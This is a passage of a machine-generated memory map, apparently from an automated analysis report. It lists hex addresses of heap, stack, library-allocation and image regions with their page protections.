trusted library allocation
page read and write
22772427000
heap
page read and write
34E6000
heap
page read and write
40C000
unkown
page write copy
27AE000
stack
page read and write
3DE9000
trusted library allocation
page read and write
70E000
stack
page read and write
3BA2000
trusted library allocation
page read and write
F05000
unkown
page readonly
38A1000
trusted library allocation
page read and write
3140000
heap
page read and write
2E14000
heap
page read and write
3E1E000
trusted library allocation
page read and write
389F000
stack
page read and write
2FFF000
stack
page read and write
31EB000
heap
page read and write
348000
stack
page read and write
2E09000
heap
page read and write
38A1000
trusted library allocation
page read and write
D6C000
heap
page read and write
34BE000
stack
page read and write
3DE9000
trusted library allocation
page read and write
3D4D000
trusted library allocation
page read and write
3291000
heap
page read and write
2E5D000
heap
page read and write
7CB000
heap
page read and write
2EF6000
heap
page read and write
3BAA000
trusted library allocation
page read and write
2BB9000
heap
page read and write
25F0000
heap
page read and write
22C000
stack
page read and write
2870000
heap
page read and write
38A1000
trusted library allocation
page read and write
35F6000
heap
page read and write
7CB000
heap
page read and write
770000
trusted library allocation
page read and write
22772434000
heap
page read and write
3BA6000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
31D9000
heap
page read and write
7DC000
heap
page read and write
3CEC000
trusted library allocation
page read and write
3D49000
trusted library allocation
page read and write
3398000
trusted library allocation
page read and write
540000
heap
page read and write
3392000
trusted library allocation
page read and write
2EA2000
heap
page read and write
2D86000
heap
page read and write
34B0000
heap
page read and write
333E000
stack
page read and write
EF3000
unkown
page readonly
29C2000
heap
page read and write
3350000
heap
page read and write
2B3F000
stack
page read and write
7E5000
heap
page read and write
33B9000
heap
page read and write
3C81000
trusted library allocation
page read and write
408D000
trusted library allocation
page read and write
339F000
stack
page read and write
3C4000
heap
page read and write
29C2000
heap
page read and write
2280000
heap
page read and write
3C81000
trusted library allocation
page read and write
400000
unkown
page readonly
2B30000
heap
page read and write
3295000
heap
page read and write
29C2000
heap
page read and write
2AF6000
heap
page read and write
22772415000
heap
page read and write
7D8000
heap
page read and write
2A40000
heap
page read and write
7B6000
heap
page read and write
7C7000
heap
page read and write
3B20000
trusted library allocation
page read and write
3207000
heap
page read and write
22772427000
heap
page read and write
2860000
heap
page read and write
350F000
stack
page read and write
346F000
stack
page read and write
28A0000
heap
page read and write
621000
unkown
page write copy
35B0000
heap
page read and write
2850000
heap
page read and write
303D000
heap
page read and write
2AA7000
heap
page read and write
3F17000
trusted library allocation
page read and write
3046000
heap
page read and write
6C4000
heap
page read and write
6B0000
heap
page read and write
31C0000
heap
page read and write
48DE000
stack
page read and write
3567000
heap
page read and write
3E5C000
trusted library allocation
page read and write
3C6F000
trusted library allocation
page read and write
510000
heap
page read and write
2858000
heap
page read and write
3056000
heap
page read and write
2D86000
heap
page read and write
2FF0000
heap
page read and write
2970000
heap
page read and write
30FF000
stack
page read and write
34CD000
heap
page read and write
2690000
heap
page read and write
3FFF000
trusted library allocation
page read and write
267F000
stack
page read and write
29C2000
heap
page read and write
288B000
heap
page read and write
3205000
heap
page read and write
34E0000
heap
page read and write
34ED000
heap
page read and write
38A1000
trusted library allocation
page read and write
3392000
trusted library allocation
page read and write
2B09000
heap
page read and write
227723E0000
heap
page read and write
227722D0000
heap
page read and write
3BA4000
trusted library allocation
page read and write
2BC9000
heap
page read and write
2EA1000
heap
page read and write
41E000
unkown
page readonly
361F000
stack
page read and write
2DF9000
heap
page read and write
2BC9000
heap
page read and write
29C2000
heap
page read and write
287B000
heap
page read and write
284F000
stack
page read and write
2BE0000
heap
page read and write
2FEE000
stack
page read and write
43D000
stack
page read and write
351A000
heap
page read and write
22772410000
heap
page read and write
3BAF000
trusted library allocation
page read and write
326E000
stack
page read and write
3502000
heap
page read and write
2C6E000
stack
page read and write
400000
unkown
page readonly
530000
heap
page read and write
2AF1000
heap
page read and write
2BE6000
heap
page read and write
3BA1000
trusted library allocation
page read and write
401000
unkown
page execute read
3C5A000
trusted library allocation
page read and write
3310000
heap
page read and write
2829000
heap
page read and write
3524000
heap
page read and write
3394000
trusted library allocation
page read and write
33A0000
heap
page read and write
7F2000
heap
page read and write
22772434000
heap
page read and write
39AF000
stack
page read and write
F01000
unkown
page write copy
7B6000
heap
page read and write
29C2000
heap
page read and write
2AEF000
heap
page read and write
3502000
heap
page read and write
7B6000
heap
page read and write
3BA1000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
2E40000
heap
page read and write
3BA7000
trusted library allocation
page read and write
2B3C000
heap
page read and write
540000
heap
page read and write
2277263D000
heap
page read and write
38A1000
trusted library allocation
page read and write
2C3E000
stack
page read and write
2E0E000
stack
page read and write
7C2000
heap
page read and write
2CE0000
heap
page read and write
3C53000
trusted library allocation
page read and write
3CD8000
trusted library allocation
page read and write
2D0000
heap
page read and write
2277241F000
heap
page read and write
750000
trusted library allocation
page read and write
770000
trusted library allocation
page read and write
929E5FF000
stack
page read and write
EFD000
unkown
page write copy
3C4000
heap
page read and write
3C5B000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
3029000
heap
page read and write
3567000
heap
page read and write
3C81000
trusted library allocation
page read and write
339B000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
2B40000
heap
page read and write
22772510000
heap
page read and write
38A1000
trusted library allocation
page read and write
2839000
heap
page read and write
263E000
stack
page read and write
3C42000
trusted library allocation
page read and write
408A000
trusted library allocation
page read and write
35C9000
heap
page read and write
3CD9000
trusted library allocation
page read and write
4A0E000
stack
page read and write
19A000
stack
page read and write
929E2FF000
stack
page read and write
2530000
heap
page read and write
2A37000
heap
page read and write
500000
unkown
page readonly
3046000
heap
page read and write
3460000
heap
page read and write
330F000
stack
page read and write
3291000
heap
page read and write
66E000
heap
page read and write
29E5000
heap
page read and write
2EA2000
heap
page read and write
2BEE000
stack
page read and write
339E000
trusted library allocation
page read and write
34D0000
heap
page read and write
6A5000
heap
page read and write
316E000
stack
page read and write
2FFE000
stack
page read and write
3BAA000
trusted library allocation
page read and write
B64000
heap
page read and write
408B000
trusted library allocation
page read and write
352C000
heap
page read and write
2DE9000
heap
page read and write
3BA5000
trusted library allocation
page read and write
3393000
trusted library allocation
page read and write
3386000
heap
page read and write
289D000
heap
page read and write
34D9000
heap
page read and write
3C18000
trusted library allocation
page read and write
2B26000
heap
page read and write
53E000
stack
page read and write
278E000
stack
page read and write
408A000
trusted library allocation
page read and write
41E000
unkown
page readonly
7CB000
heap
page read and write
E30000
unkown
page readonly
3291000
heap
page read and write
350A000
heap
page read and write
4A8E000
stack
page read and write
2E7E000
stack
page read and write
77C000
trusted library allocation
page read and write
76E000
heap
page read and write
2D34000
heap
page read and write
27E0000
heap
page read and write
38A1000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
3C4A000
trusted library allocation
page read and write
7D8000
heap
page read and write
34F7000
heap
page read and write
2E16000
heap
page read and write
3F4E000
trusted library allocation
page read and write
2B26000
heap
page read and write
2D80000
heap
page read and write
4080000
trusted library allocation
page read and write
3D27000
trusted library allocation
page read and write
3C18000
trusted library allocation
page read and write
29EA000
heap
page read and write
3890000
heap
page read and write
31C6000
heap
page read and write
3ED4000
trusted library allocation
page read and write
2549000
heap
page read and write
3D56000
trusted library allocation
page read and write
3C4000
heap
page read and write
3C50000
trusted library allocation
page read and write
55E000
stack
page read and write
3C81000
trusted library allocation
page read and write
3398000
trusted library allocation
page read and write
2849000
heap
page read and write
3C4E000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
2B30000
heap
page read and write
29C2000
heap
page read and write
3BA5000
trusted library allocation
page read and write
3039000
heap
page read and write
22772417000
heap
page read and write
409000
unkown
page readonly
3C4000
heap
page read and write
2694000
heap
page read and write
401000
unkown
page execute read
3C81000
trusted library allocation
page read and write
3C41000
trusted library allocation
page read and write
5BE000
stack
page read and write
3350000
heap
page read and write
7DC000
heap
page read and write
3D57000
trusted library allocation
page read and write
7C2000
heap
page read and write
4083000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
2EE0000
heap
page read and write
227724E0000
heap
page read and write
3C62000
trusted library allocation
page read and write
67E000
stack
page read and write
39C0000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
2DAF000
stack
page read and write
7CB000
heap
page read and write
2FC0000
heap
page read and write
750000
trusted library allocation
page read and write
3D57000
trusted library allocation
page read and write
34FD000
heap
page read and write
38A1000
trusted library allocation
page read and write
3981000
trusted library allocation
page read and write
3BAC000
trusted library allocation
page read and write
24CF000
stack
page read and write
3D2E000
trusted library allocation
page read and write
29C2000
heap
page read and write
970000
heap
page read and write
27D0000
heap
page read and write
2D3B000
heap
page read and write
2AA0000
heap
page read and write
7C2000
heap
page read and write
3396000
trusted library allocation
page read and write
37BF000
stack
page read and write
2C40000
heap
page read and write
29C2000
heap
page read and write
3291000
heap
page read and write
2AE8000
heap
page read and write
38A1000
trusted library allocation
page read and write
3C4000
heap
page read and write
7CB000
heap
page read and write
3538000
heap
page read and write
B64000
heap
page read and write
32E0000
heap
page read and write
7DC000
heap
page read and write
3510000
heap
page read and write
34C4000
heap
page read and write
3391000
trusted library allocation
page read and write
40C000
unkown
page read and write
2EA1000
heap
page read and write
3397000
trusted library allocation
page read and write
29C2000
heap
page read and write
3490000
heap
page read and write
425000
unkown
page write copy
26CF000
stack
page read and write
2FCD000
heap
page read and write
3BA8000
trusted library allocation
page read and write
2277244F000
heap
page read and write
29C2000
heap
page read and write
4087000
trusted library allocation
page read and write
2EA2000
heap
page read and write
750000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
3BA3000
trusted library allocation
page read and write
287C000
heap
page read and write
3C51000
trusted library allocation
page read and write
98000
stack
page read and write
29C2000
heap
page read and write
3291000
heap
page read and write
3BAA000
trusted library allocation
page read and write
39BF000
trusted library allocation
page read and write
408A000
trusted library allocation
page read and write
2AB0000
heap
page read and write
2ACE000
heap
page read and write
3D7B000
trusted library allocation
page read and write
39A1000
trusted library allocation
page read and write
30DF000
stack
page read and write
347E000
stack
page read and write
2E19000
heap
page read and write
7D8000
heap
page read and write
3A81000
trusted library allocation
page read and write
33BF000
stack
page read and write
3BAA000
trusted library allocation
page read and write
290D000
stack
page read and write
3370000
heap
page read and write
29C2000
heap
page read and write
3C18000
trusted library allocation
page read and write
3291000
heap
page read and write
3291000
heap
page read and write
2E2E000
stack
page read and write
2FDE000
stack
page read and write
2E75000
heap
page read and write
28CB000
heap
page read and write
6A0000
heap
page read and write
3C6D000
trusted library allocation
page read and write
36EE000
stack
page read and write
2FC6000
heap
page read and write
2FD0000
heap
page read and write
3CF5000
trusted library allocation
page read and write
32FE000
stack
page read and write
2FFD000
stack
page read and write
3208000
heap
page read and write
7C2000
heap
page read and write
408E000
trusted library allocation
page read and write
45CE000
stack
page read and write
3C81000
trusted library allocation
page read and write
31E5000
heap
page read and write
29C2000
heap
page read and write
2D20000
heap
page read and write
3B17000
trusted library allocation
page read and write
4A4F000
stack
page read and write
92F000
stack
page read and write
3BA0000
trusted library allocation
page read and write
2EFC000
stack
page read and write
2850000
heap
page read and write
2839000
heap
page read and write
4080000
trusted library allocation
page read and write
39A1000
trusted library allocation
page read and write
3BA0000
trusted library allocation
page read and write
2E76000
heap
page read and write
3BA5000
trusted library allocation
page read and write
3B16000
trusted library allocation
page read and write
31EB000
heap
page read and write
2D50000
heap
page read and write
3C4000
heap
page read and write
7C7000
heap
page read and write
5ED000
unkown
page readonly
2926000
heap
page read and write
5B0000
heap
page read and write
3291000
heap
page read and write
3BA5000
trusted library allocation
page read and write
30AF000
stack
page read and write
2D10000
heap
page read and write
2B7D000
stack
page read and write
2EA1000
heap
page read and write
2E5B000
heap
page read and write
408E000
trusted library allocation
page read and write
4087000
trusted library allocation
page read and write
408A000
trusted library allocation
page read and write
350B000
heap
page read and write
3BAE000
trusted library allocation
page read and write
2AFE000
stack
page read and write
7D8000
heap
page read and write
2844000
heap
page read and write
3542000
heap
page read and write
3DD2000
trusted library allocation
page read and write
29EB000
heap
page read and write
2AF2000
heap
page read and write
76B000
heap
page read and write
2E36000
heap
page read and write
31ED000
heap
page read and write
2E9F000
stack
page read and write
5FD000
stack
page read and write
7C2000
heap
page read and write
81C000
stack
page read and write
2AFD000
stack
page read and write
5E0000
heap
page read and write
408D000
trusted library allocation
page read and write
2CFE000
stack
page read and write
31B0000
heap
page read and write
2AE6000
heap
page read and write
3D4C000
trusted library allocation
page read and write
29C2000
heap
page read and write
35F6000
heap
page read and write
23D0000
heap
page read and write
2A1B000
heap
page read and write
284D000
heap
page read and write
3E33000
trusted library allocation
page read and write
3291000
heap
page read and write
58E000
stack
page read and write
29C2000
heap
page read and write
3210000
heap
page read and write
2FC9000
heap
page read and write
5B6000
heap
page read and write
3BA4000
trusted library allocation
page read and write
2BF6000
heap
page read and write
227723E8000
heap
page read and write
7C7000
heap
page read and write
2EBD000
stack
page read and write
10C3000
heap
page read and write
3E33000
trusted library allocation
page read and write
339C000
trusted library allocation
page read and write
2CDE000
stack
page read and write
3BA6000
trusted library allocation
page read and write
3C49000
trusted library allocation
page read and write
489F000
stack
page read and write
3C63000
trusted library allocation
page read and write
4A62000
heap
page read and write
7C7000
heap
page read and write
38A1000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
776000
trusted library allocation
page read and write
4082000
trusted library allocation
page read and write
3DD3000
trusted library allocation
page read and write
2872000
heap
page read and write
550000
unkown
page readonly
33A0000
heap
page read and write
3A81000
trusted library allocation
page read and write
3C4000
heap
page read and write
7CB000
heap
page read and write
227723B0000
heap
page read and write
1010000
trusted library allocation
page read and write
2BF0000
heap
page read and write
3BAE000
trusted library allocation
page read and write
29C2000
heap
page read and write
2277244E000
heap
page read and write
29C2000
heap
page read and write
22774190000
heap
page read and write
33BD000
heap
page read and write
34E8000
heap
page read and write
34FF000
heap
page read and write
2BFF000
stack
page read and write
428000
unkown
page write copy
3C81000
trusted library allocation
page read and write
401000
unkown
page execute read
4086000
trusted library allocation
page read and write
776000
trusted library allocation
page read and write
2D58000
heap
page read and write
7C7000
heap
page read and write
4A60000
heap
page read and write
3CDA000
trusted library allocation
page read and write
4089000
trusted library allocation
page read and write
6C4000
heap
page read and write
29C2000
heap
page read and write
3BAC000
trusted library allocation
page read and write
39B5000
trusted library allocation
page read and write
2FCD000
heap
page read and write
22F0000
heap
page read and write
3350000
heap
page read and write
372E000
stack
page read and write
3C81000
trusted library allocation
page read and write
29ED000
heap
page read and write
144B000
heap
page read and write
268E000
stack
page read and write
2CFD000
stack
page read and write
3C4000
heap
page read and write
3D7C000
trusted library allocation
page read and write
3330000
heap
page read and write
62E000
stack
page read and write
2D56000
heap
page read and write
3394000
trusted library allocation
page read and write
2BF0000
heap
page read and write
2BE6000
heap
page read and write
420000
unkown
page read and write
2C5D000
stack
page read and write
3545000
heap
page read and write
3C81000
trusted library allocation
page read and write
39A1000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
3C18000
trusted library allocation
page read and write
7CB000
heap
page read and write
32FD000
stack
page read and write
2C10000
heap
page read and write
3A81000
trusted library allocation
page read and write
929E1FF000
stack
page read and write
3D6B000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
3291000
heap
page read and write
33F0000
heap
page read and write
2EE6000
heap
page read and write
3020000
heap
page read and write
3C81000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
3515000
heap
page read and write
3394000
trusted library allocation
page read and write
3470000
heap
page read and write
2D3B000
heap
page read and write
3291000
heap
page read and write
7B3000
heap
page read and write
3CF5000
trusted library allocation
page read and write
3C60000
trusted library allocation
page read and write
3291000
heap
page read and write
289B000
heap
page read and write
4A69000
heap
page read and write
3B63000
trusted library allocation
page read and write
2C90000
heap
page read and write
3D31000
trusted library allocation
page read and write
3D3D000
trusted library allocation
page read and write
408E000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
29C2000
heap
page read and write
523F000
stack
page read and write
31E0000
heap
page read and write
2B2F000
stack
page read and write
35D1000
heap
page read and write
3530000
heap
page read and write
3C81000
trusted library allocation
page read and write
3391000
trusted library allocation
page read and write
29F6000
heap
page read and write
3BA6000
trusted library allocation
page read and write
7F7000
heap
page read and write
2C5E000
stack
page read and write
38A0000
heap
page read and write
22F4000
heap
page read and write
3BA5000
trusted library allocation
page read and write
2A35000
heap
page read and write
2DEF000
stack
page read and write
4ACF000
stack
page read and write
2546000
heap
page read and write
22772434000
heap
page read and write
2E40000
heap
page read and write
61D000
unkown
page write copy
35F6000
heap
page read and write
2BC4000
heap
page read and write
7CB000
heap
page read and write
613000
unkown
page readonly
29C2000
heap
page read and write
34EE000
stack
page read and write
2277243D000
heap
page read and write
3C4C000
trusted library allocation
page read and write
32D6000
heap
page read and write
2EA2000
heap
page read and write
29C2000
heap
page read and write
377E000
stack
page read and write
2B3D000
heap
page read and write
1010000
trusted library allocation
page read and write
2BE6000
heap
page read and write
2D35000
heap
page read and write
3170000
heap
page read and write
408B000
trusted library allocation
page read and write
29C2000
heap
page read and write
29C2000
heap
page read and write
2AE4000
heap
page read and write
2C7E000
stack
page read and write
6A9000
heap
page read and write
3397000
trusted library allocation
page read and write
7D8000
heap
page read and write
3398000
trusted library allocation
page read and write
36B0000
heap
page read and write
3217000
heap
page read and write
39A1000
trusted library allocation
page read and write
22772444000
heap
page read and write
29C2000
heap
page read and write
4082000
trusted library allocation
page read and write
236B000
heap
page read and write
3BAB000
trusted library allocation
page read and write
3BAE000
trusted library allocation
page read and write
3F18000
trusted library allocation
page read and write
3CDE000
trusted library allocation
page read and write
2AE6000
heap
page read and write
773000
trusted library allocation
page read and write
339C000
trusted library allocation
page read and write
2F0D000
stack
page read and write
2CEF000
stack
page read and write
2FFF000
stack
page read and write
3A00000
trusted library allocation
page read and write
289D000
heap
page read and write
7CB000
heap
page read and write
2277240D000
heap
page read and write
22F0000
heap
page read and write
3C6A000
trusted library allocation
page read and write
6E7000
heap
page read and write
38A1000
trusted library allocation
page read and write
2DE0000
heap
page read and write
3AA7000
trusted library allocation
page read and write
3019000
heap
page read and write
2277244F000
heap
page read and write
38DE000
trusted library allocation
page read and write
2EE7000
heap
page read and write
2831000
heap
page read and write
39A1000
trusted library allocation
page read and write
3B20000
trusted library allocation
page read and write
3F4E000
trusted library allocation
page read and write
3D3A000
trusted library allocation
page read and write
7C7000
heap
page read and write
771000
trusted library allocation
page read and write
39B8000
trusted library allocation
page read and write
33DE000
stack
page read and write
3BA0000
trusted library allocation
page read and write
3291000
heap
page read and write
351A000
heap
page read and write
3395000
trusted library allocation
page read and write
3291000
heap
page read and write
2FBE000
stack
page read and write
31AF000
stack
page read and write
3BA8000
trusted library allocation
page read and write
36AF000
stack
page read and write
3320000
heap
page read and write
7C7000
heap
page read and write
2ADA000
heap
page read and write
7B6000
heap
page read and write
30FD000
stack
page read and write
310F000
stack
page read and write
3D1E000
trusted library allocation
page read and write
3DD3000
trusted library allocation
page read and write
780000
heap
page read and write
2FCF000
heap
page read and write
35BC000
stack
page read and write
29C2000
heap
page read and write
3220000
heap
page read and write
10C5000
heap
page read and write
283E000
stack
page read and write
5FE000
stack
page read and write
29C2000
heap
page read and write
3CF1000
trusted library allocation
page read and write
27A0000
heap
page read and write
3D31000
trusted library allocation
page read and write
22772427000
heap
page read and write
2F70000
heap
page read and write
2B60000
heap
page read and write
2E55000
heap
page read and write
2EC0000
heap
page read and write
6C7000
heap
page read and write
36CF000
stack
page read and write
29C2000
heap
page read and write
3C63000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
29E0000
heap
page read and write
3392000
trusted library allocation
page read and write
3ACF000
trusted library allocation
page read and write
33D6000
heap
page read and write
34FF000
stack
page read and write
29C2000
heap
page read and write
2E51000
heap
page read and write
2B10000
heap
page read and write
2EFE000
stack
page read and write
3C69000
trusted library allocation
page read and write
34C9000
heap
page read and write
2EE6000
heap
page read and write
39A1000
trusted library allocation
page read and write
3C4000
heap
page read and write
3C81000
trusted library allocation
page read and write
2540000
heap
page read and write
34AE000
stack
page read and write
41F000
unkown
page read and write
3C5A000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
19A000
stack
page read and write
3C81000
trusted library allocation
page read and write
22B0000
heap
page read and write
3391000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
2B0D000
heap
page read and write
33A6000
heap
page read and write
2A1F000
stack
page read and write
2542000
heap
page read and write
29C2000
heap
page read and write
4085000
trusted library allocation
page read and write
408D000
trusted library allocation
page read and write
3E33000
trusted library allocation
page read and write
440000
heap
page read and write
339F000
trusted library allocation
page read and write
3F4E000
trusted library allocation
page read and write
25DF000
stack
page read and write
27EE000
stack
page read and write
29AD000
stack
page read and write
4A69000
heap
page read and write
3C81000
trusted library allocation
page read and write
22772436000
heap
page read and write
2D29000
heap
page read and write
3BA0000
trusted library allocation
page read and write
29C2000
heap
page read and write
B64000
heap
page read and write
929DDFE000
stack
page read and write
3291000
heap
page read and write
3F8A000
trusted library allocation
page read and write
7DC000
heap
page read and write
770000
trusted library allocation
page read and write
7C7000
heap
page read and write
4910000
heap
page read and write
339F000
trusted library allocation
page read and write
29C2000
heap
page read and write
7DC000
heap
page read and write
401000
unkown
page execute read
3291000
heap
page read and write
9EE000
stack
page read and write
35F7000
heap
page read and write
38A1000
trusted library allocation
page read and write
2A2F000
stack
page read and write
3430000
heap
page read and write
3216000
heap
page read and write
640000
heap
page read and write
34E6000
heap
page read and write
FCD000
heap
page read and write
33B4000
heap
page read and write
404F000
stack
page read and write
4640000
heap
page read and write
3010000
heap
page read and write
29E8000
heap
page read and write
2D3B000
heap
page read and write
21FF000
stack
page read and write
2EA2000
heap
page read and write
3DE9000
trusted library allocation
page read and write
7CB000
heap
page read and write
95F000
stack
page read and write
351A000
heap
page read and write
29C2000
heap
page read and write
2E0E000
stack
page read and write
3CED000
trusted library allocation
page read and write
2750000
heap
page read and write
3BA1000
trusted library allocation
page read and write
8D0000
heap
page read and write
2AE6000
heap
page read and write
2EA2000
heap
page read and write
315E000
stack
page read and write
2AFE000
heap
page read and write
34C9000
heap
page read and write
27C0000
heap
page read and write
3D4D000
trusted library allocation
page read and write
2E00000
heap
page read and write
3EA4000
trusted library allocation
page read and write
2AE7000
heap
page read and write
34C1000
heap
page read and write
32AE000
stack
page read and write
40B000
unkown
page write copy
3CE4000
trusted library allocation
page read and write
3DA0000
trusted library allocation
page read and write
2277242F000
heap
page read and write
7F7000
heap
page read and write
2550000
heap
page read and write
280E000
stack
page read and write
3359000
heap
page read and write
1010000
trusted library allocation
page read and write
35D9000
heap
page read and write
29C2000
heap
page read and write
39A1000
trusted library allocation
page read and write
29C2000
heap
page read and write
2C0E000
stack
page read and write
500000
heap
page read and write
2FF6000
heap
page read and write
2E16000
heap
page read and write
3397000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
3C57000
trusted library allocation
page read and write
2BC1000
heap
page read and write
39AF000
trusted library allocation
page read and write
70E000
stack
page read and write
24A0000
heap
page read and write
39BC000
trusted library allocation
page read and write
770000
trusted library allocation
page read and write
770000
heap
page read and write
2FC6000
heap
page read and write
929E0FF000
stack
page read and write
929DCFA000
stack
page read and write
29C1000
heap
page read and write
2EA2000
heap
page read and write
2EDE000
stack
page read and write
3BAD000
trusted library allocation
page read and write
361F000
stack
page read and write
FF0000
heap
page read and write
35D9000
heap
page read and write
2E11000
heap
page read and write
3291000
heap
page read and write
29C2000
heap
page read and write
3BA9000
trusted library allocation
page read and write
4083000
trusted library allocation
page read and write
29C1000
heap
page read and write
3A81000
trusted library allocation
page read and write
334E000
stack
page read and write
3A81000
trusted library allocation
page read and write
2CAE000
stack
page read and write
3BA4000
trusted library allocation
page read and write
2D0E000
stack
page read and write
750000
trusted library allocation
page read and write
2E5B000
heap
page read and write
2F4C000
stack
page read and write
339B000
trusted library allocation
page read and write
3C81000
trusted library allocation
page read and write
3296000
heap
page read and write
3F4E000
trusted library allocation
page read and write
2B50000
heap
page read and write
27AE000
stack
page read and write
3D2F000
trusted library allocation
page read and write
2730000
heap
page read and write
2A00000
heap
page read and write
2856000
heap
page read and write
8B6000
heap
page read and write
3C81000
trusted library allocation
page read and write
B64000
heap
page read and write
3010000
heap
page read and write
3160000
heap
page read and write
286E000
heap
page read and write
DD000
stack
page read and write
2EBF000
stack
page read and write
2BE6000
heap
page read and write
7E5000
heap
page read and write
29C2000
heap
page read and write
3D57000
trusted library allocation
page read and write
7C2000
heap
page read and write
3E33000
trusted library allocation
page read and write
286E000
heap
page read and write
3506000
heap
page read and write
2880000
trusted library allocation
page read and write
2FCD000
stack
page read and write
6C7000
heap
page read and write
29C2000
heap
page read and write
351A000
heap
page read and write
3D31000
trusted library allocation
page read and write
29C2000
heap
page read and write
39A1000
trusted library allocation
page read and write
4F4000
unkown
page readonly
27C0000
heap
page read and write
3DB4000
trusted library allocation
page read and write
38CF000
stack
page read and write
35D4000
heap
page read and write
3291000
heap
page read and write
3D26000
trusted library allocation
page read and write
3216000
heap
page read and write
408B000
trusted library allocation
page read and write
3270000
heap
page read and write
425000
unkown
page read and write
4A69000
heap
page read and write
59E000
stack
page read and write
49C000
stack
page read and write
3120000
heap
page read and write
3C81000
trusted library allocation
page read and write
2277244F000
heap
page read and write
3C0000
heap
page read and write
287F000
stack
page read and write
750000
trusted library allocation
page read and write
29C2000
heap
page read and write
3567000
heap
page read and write
3D27000
trusted library allocation
page read and write
2880000
trusted library allocation
page read and write
3291000
heap
page read and write
3291000
heap
page read and write
3C4A000
trusted library allocation
page read and write
7CB000
heap
page read and write
29C2000
heap
page read and write
38A1000
trusted library allocation
page read and write
3376000
heap
page read and write
31C0000
heap
page read and write
3376000
heap
page read and write
22772449000
heap
page read and write
2EA1000
heap
page read and write
328E000
stack
page read and write
2B00000
heap
page read and write
35D9000
heap
page read and write
288F000
heap
page read and write
2C8E000
stack
page read and write
401000
unkown
page execute read
33A9000
heap
page read and write
2BCD000
heap
page read and write
227723FC000
heap
page read and write
29C2000
heap
page read and write
3180000
heap
page read and write
B64000
heap
page read and write
2700000
heap
page read and write
27D0000
heap
page read and write
408D000
trusted library allocation
page read and write
3291000
heap
page read and write
3349000
heap
page read and write
3C5D000
trusted library allocation
page read and write
7B6000
heap
page read and write
31D0000
heap
page read and write
3BAD000
trusted library allocation
page read and write
354A000
heap
page read and write
3C81000
trusted library allocation
page read and write
3399000
trusted library allocation
page read and write
38DC000
trusted library allocation
page read and write
3F4E000
trusted library allocation
page read and write
2EF0000
heap
page read and write
4083000
trusted library allocation
page read and write
3356000
heap
page read and write
28C0000
heap
page read and write
3C81000
trusted library allocation
page read and write
2E8F000
stack
page read and write
22772434000
heap
page read and write
7C2000
heap
page read and write
37C0000
heap
page read and write
35AE000
stack
page read and write
3B17000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
2ACE000
heap
page read and write
2B36000
heap
page read and write
2F1F000
stack
page read and write
351E000
heap
page read and write
30FD000
stack
page read and write
39A1000
trusted library allocation
page read and write
272E000
stack
page read and write
352F000
heap
page read and write
2A36000
heap
page read and write
3C81000
trusted library allocation
page read and write
38A1000
trusted library allocation
page read and write
2FCA000
heap
page read and write
3D3E000
trusted library allocation
page read and write
9C000
stack
page read and write
2D06000
heap
page read and write
3BAB000
trusted library allocation
page read and write
2856000
heap
page read and write
4087000
trusted library allocation
page read and write
400000
unkown
page readonly
34AF000
stack
page read and write
3C81000
trusted library allocation
page read and write
22772427000
heap
page read and write
3376000
heap
page read and write
3C49000
trusted library allocation
page read and write
3C18000
trusted library allocation
page read and write
2866000
heap
page read and write
29C2000
heap
page read and write
B64000
heap
page read and write
52BF000
stack
page read and write
31C6000
heap
page read and write
3C4000
heap
page read and write
4089000
trusted library allocation
page read and write
408B000
trusted library allocation
page read and write
2920000
heap
page read and write
29C2000
heap
page read and write
38A1000
trusted library allocation
page read and write
3A81000
trusted library allocation
page read and write
4AD0000
heap
page read and write
2CB0000
heap
page read and write
2554000
heap
page read and write
363F000
stack
page read and write
22772437000
heap
page read and write
3C5E000
trusted library allocation
page read and write
46B000
unkown
page read and write
22772430000
heap
page read and write
2CBD000
stack
page read and write
31E4000
heap
page read and write
34FD000
heap
page read and write
2F3C000
stack
page read and write
3D6B000
trusted library allocation
page read and write
3E4A000
trusted library allocation
page read and write
2F50000
heap
page read and write
750000
trusted library allocation
page read and write
510000
heap
page read and write
3C45000
trusted library allocation
page read and write
34B9000
heap
page read and write
3D3E000
trusted library allocation
page read and write
3056000
heap
page read and write
7B6000
heap
page read and write
3C49000
trusted library allocation
page read and write
7F2000
heap
page read and write
2710000
heap
page read and write
2AF5000
heap
page read and write
3291000
heap
page read and write
7C2000
heap
page read and write
2E30000
heap
page read and write
3393000
trusted library allocation
page read and write
7D8000
heap
page read and write
22B6000
heap
page read and write
6CF000
stack
page read and write
774000
trusted library allocation
page read and write
3BA7000
trusted library allocation
page read and write
2EA2000
heap
page read and write
3BA1000
trusted library allocation
page read and write
259E000
stack
page read and write
2D59000
heap
page read and write
22772635000
heap
page read and write
2EB8000
heap
page read and write
2E78000
heap
page read and write
3380000
heap
page read and write
22772410000
heap
page read and write
3D4D000
trusted library allocation
page read and write
22772427000
heap
page read and write
2C1F000
unkown
page read and write
2360000
heap
page read and write
3C3B000
trusted library allocation
page read and write
2D55000
heap
page read and write
52C0000
heap
page read and write
3BA0000
trusted library allocation
page read and write
2D55000
heap
page read and write
2708000
heap
page read and write
3C56000
trusted library allocation
page read and write
3291000
heap
page read and write
311F000
stack
page read and write
29C2000
heap
page read and write
3291000
heap
page read and write
2FC4000
heap
page read and write
3D0E000
trusted library allocation
page read and write
3E32000
trusted library allocation
page read and write
3C4F000
trusted library allocation
page read and write
7C7000
heap
page read and write
29C2000
heap
page read and write
39A1000
trusted library allocation
page read and write
3C81000
trusted library allocation
